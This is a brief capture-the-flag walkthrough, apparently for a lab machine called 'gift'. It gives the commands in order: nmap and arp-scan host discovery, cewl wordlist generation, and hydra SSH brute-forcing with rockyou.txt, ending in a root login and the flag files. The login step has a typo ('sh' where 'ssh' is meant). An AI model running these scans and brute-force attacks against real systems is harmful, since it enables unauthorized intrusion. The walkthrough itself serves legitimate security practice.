1. Scan subnet

        sudo nmap 192.168.1.0/24

2. Full Scan IP

        sudo nmap -n -Pn -sS -p- 192.168.1.192 --open

3. Search IPs into Network

        sudo arp-scan -l

4.  Get info from page

        curl 192.168.1.192

5. Generate dicc from URL output

        cewl --with-numbers 192.168.1.192 -w dicc

6. add user root and admint to dicc
        echo admin >> dicc
        echo root >> dicc

7. Brute force attack ussing dicc and rockyou.txt

        sudo hydra -t 64 -L dicc -P /usr/share/wordlists/rockyou.txt ssh://$ip -f

8. Brute force attack ussing dicc and dicc. Same result but faster

        sudo hydra -t 64 -L dicc -P dicc ssh://$ip -f

9. Connect to victim with user root and password

        sh root@$ip

9. Obtain Flags and user id

        gift:~# ls 
        root.txt  user.txt
        gift:~# id
        uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Powered by [Jose Santos](https://www.linkedin.com/in/jose-santos-guijarro)
